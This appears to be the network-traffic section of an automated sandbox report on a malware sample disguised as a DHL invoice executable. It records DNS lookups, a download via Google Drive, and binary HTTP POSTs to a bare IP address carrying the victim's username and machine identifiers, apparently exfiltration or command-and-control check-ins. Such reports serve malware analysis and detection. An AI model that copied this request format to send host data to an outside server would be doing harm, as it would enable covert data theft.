                                                                          Aug 10, 2023 19:20:52.828138113 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.828211069 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.828437090 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.828504086 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.828732967 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.828785896 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.829009056 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.829274893 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.829494953 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.829549074 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.829767942 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.830030918 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.830281973 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.830351114 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.830605984 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.830661058 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.830832958 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.830908060 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.830971956 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.831012964 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.831192970 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.831398010 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.831659079 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.831713915 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.831918001 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.831988096 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.832192898 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.832247019 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.832474947 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.832748890 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.832957983 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.833015919 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.833234072 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.833353043 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.833637953 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.833693027 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.833898067 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.834178925 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.834403038 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.834459066 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.834764957 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.834836960 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.835024118 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.835052013 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.835110903 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.835225105 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.835270882 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.835474014 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.835683107 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.835736990 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.835954905 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.836000919 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.836087942 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.836127043 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.836282015 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.836468935 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.836767912 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.836824894 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.837001085 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.837027073 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.837085962 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.837176085 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.837256908 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.837287903 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.837482929 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.837534904 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.837728977 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.837783098 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.837994099 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.838022947 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.838198900 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.838202000 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.838233948 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.838433981 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.838466883 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.838639975 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.838665962 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.838860989 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.838866949 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.838891029 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.839030981 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.839030981 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.839087963 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.839291096 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.839318991 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.839492083 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.839521885 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.839720011 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.839744091 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.839927912 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.839953899 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.840214968 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.840245962 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.840435982 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.840462923 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.840665102 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.840693951 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.840833902 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.840852022 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.841042042 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.841080904 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.841100931 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.841185093 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.841237068 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.841356039 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.841603041 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.841645956 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.841829062 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.841842890 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.841870070 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.842032909 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.842125893 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.842267990 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.842294931 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.842314005 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.842386961 CEST44349721142.250.185.129192.168.11.20
                                                                          Aug 10, 2023 19:20:52.842437029 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:52.842536926 CEST49721443192.168.11.20142.250.185.129
                                                                          Aug 10, 2023 19:20:54.192055941 CEST4972280192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:54.300416946 CEST8049722216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:54.300633907 CEST4972280192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:54.302237034 CEST4972280192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:54.410917044 CEST8049722216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:54.411098003 CEST4972280192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:54.519495010 CEST8049722216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:55.306443930 CEST8049722216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:55.306471109 CEST8049722216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:55.306492090 CEST8049722216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:55.306513071 CEST8049722216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:55.306533098 CEST8049722216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:55.306552887 CEST8049722216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:55.306571960 CEST8049722216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:55.306591988 CEST8049722216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:55.306612015 CEST8049722216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:55.306639910 CEST4972280192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:55.306740999 CEST4972280192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:55.306765079 CEST4972280192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:55.306767941 CEST8049722216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:55.306874990 CEST4972280192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:55.306958914 CEST4972280192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:55.425380945 CEST8049722216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:55.425395966 CEST8049722216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:55.425623894 CEST4972280192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:55.425623894 CEST4972280192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:55.429199934 CEST8049722216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:55.429282904 CEST8049722216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:55.429496050 CEST4972280192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:55.439420938 CEST4972380192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:55.546385050 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:55.546578884 CEST4972380192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:55.548475981 CEST4972380192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:55.655670881 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:55.655841112 CEST4972380192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:55.763034105 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.569920063 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.570039988 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.570055008 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.570185900 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.570199966 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.570211887 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.570230007 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.570245028 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.570256948 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.570312977 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.570343018 CEST4972380192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:56.570468903 CEST4972380192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:56.570568085 CEST4972380192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:56.570808887 CEST4972380192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:56.677390099 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.677504063 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.677640915 CEST4972380192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:56.677736998 CEST4972380192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:56.681258917 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.681391001 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.681467056 CEST4972380192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:56.681700945 CEST4972380192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:56.688894033 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.688909054 CEST8049723216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.689088106 CEST4972380192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:56.689089060 CEST4972380192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:56.759731054 CEST4972480192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:56.867784977 CEST8049724216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.868033886 CEST4972480192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:56.869971037 CEST4972480192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:56.977838039 CEST8049724216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:56.977991104 CEST4972480192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:57.086049080 CEST8049724216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:57.878973961 CEST8049724216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:57.879017115 CEST8049724216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:57.879050016 CEST8049724216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:57.879084110 CEST8049724216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:57.879115105 CEST8049724216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:57.879144907 CEST8049724216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:57.879175901 CEST8049724216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:57.879206896 CEST8049724216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:57.879239082 CEST8049724216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:57.879270077 CEST8049724216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:57.879317045 CEST4972480192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:57.879317045 CEST4972480192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:57.879445076 CEST4972480192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:57.879445076 CEST4972480192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:57.879445076 CEST4972480192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:57.987329006 CEST8049724216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:57.987374067 CEST8049724216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:57.987694025 CEST4972480192.168.11.20216.128.145.196
                                                                          Aug 10, 2023 19:20:57.991216898 CEST8049724216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:57.991255999 CEST8049724216.128.145.196192.168.11.20
                                                                          Aug 10, 2023 19:20:57.991461992 CEST4972480192.168.11.20216.128.145.196
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Aug 10, 2023 19:20:51.772660017 CEST5984653192.168.11.201.1.1.1
                                                                          Aug 10, 2023 19:20:51.781563997 CEST53598461.1.1.1192.168.11.20
                                                                          Aug 10, 2023 19:20:52.477771044 CEST5551153192.168.11.201.1.1.1
                                                                          Aug 10, 2023 19:20:52.520982981 CEST53555111.1.1.1192.168.11.20
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Aug 10, 2023 19:20:51.772660017 CEST192.168.11.201.1.1.10xa706Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                          Aug 10, 2023 19:20:52.477771044 CEST192.168.11.201.1.1.10x6269Standard query (0)doc-08-3o-docs.googleusercontent.comA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Aug 10, 2023 19:20:51.781563997 CEST1.1.1.1192.168.11.200xa706No error (0)drive.google.com142.250.185.110A (IP address)IN (0x0001)false
                                                                          Aug 10, 2023 19:20:52.520982981 CEST1.1.1.1192.168.11.200x6269No error (0)doc-08-3o-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                          Aug 10, 2023 19:20:52.520982981 CEST1.1.1.1192.168.11.200x6269No error (0)googlehosted.l.googleusercontent.com142.250.185.129A (IP address)IN (0x0001)false
                                                                          • drive.google.com
                                                                          • doc-08-3o-docs.googleusercontent.com
                                                                          • 216.128.145.196
                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.11.2049720142.250.185.110443C:\Users\user\Desktop\DHL_INVOICE.exe
                                                                          TimestampkBytes transferredDirectionData


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          1192.168.11.2049721142.250.185.129443C:\Users\user\Desktop\DHL_INVOICE.exe
                                                                          TimestampkBytes transferredDirectionData


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          2192.168.11.2049722216.128.145.19680C:\Users\user\Desktop\DHL_INVOICE.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Aug 10, 2023 19:20:54.302237034 CEST149OUTPOST /~wellseconds/?p=9651 HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 216.128.145.196
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: A0B49A50
                                                                          Content-Length: 178
                                                                          Connection: close
                                                                          Aug 10, 2023 19:20:54.411098003 CEST149OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                                                          Data Ascii: 'ckav.ruArthur141700W1064_038k028278665D4ACB73EF64D459ACaqRi
                                                                          Aug 10, 2023 19:20:55.306443930 CEST151INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 10 Aug 2023 17:20:54 GMT
                                                                          Server: Apache
                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                          Link: <http://216-128-145-196.cprapid.com/~wellseconds/wp-json/>; rel="https://api.w.org/"
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 65 6c 6c 20 53 65 63 6f 6e 64 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 65 6c 6c 20 53 65 63 6f 6e 64 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 65 6c 6c 20 53 65 63 6f 6e 64 73 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 5c 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 33 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65
                                                                          Data Ascii: <!doctype html><html lang="en-US" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page not found &#8211; Well Seconds</title><meta name='robots' content='noindex, nofollow' /><link rel='dns-prefetch' href='//216-128-145-196.cprapid.com' /><link rel="alternate" type="application/rss+xml" title="Well Seconds &raquo; Feed" href="http://216-128-145-196.cprapid.com/~wellseconds/feed/" /><link rel="alternate" type="application/rss+xml" title="Well Seconds &raquo; Comments Feed" href="http://216-128-145-196.cprapid.com/~wellseconds/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/216-128-145-196.cprapid.com\/~wellseconds\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.3"}};/*! This file
                                                                          Aug 10, 2023 19:20:55.306471109 CEST152INData Raw: 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73
                                                                          Data Ascii: is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.f
                                                                          Aug 10, 2023 19:20:55.306492090 CEST153INData Raw: 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f
                                                                          Data Ascii: o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports"
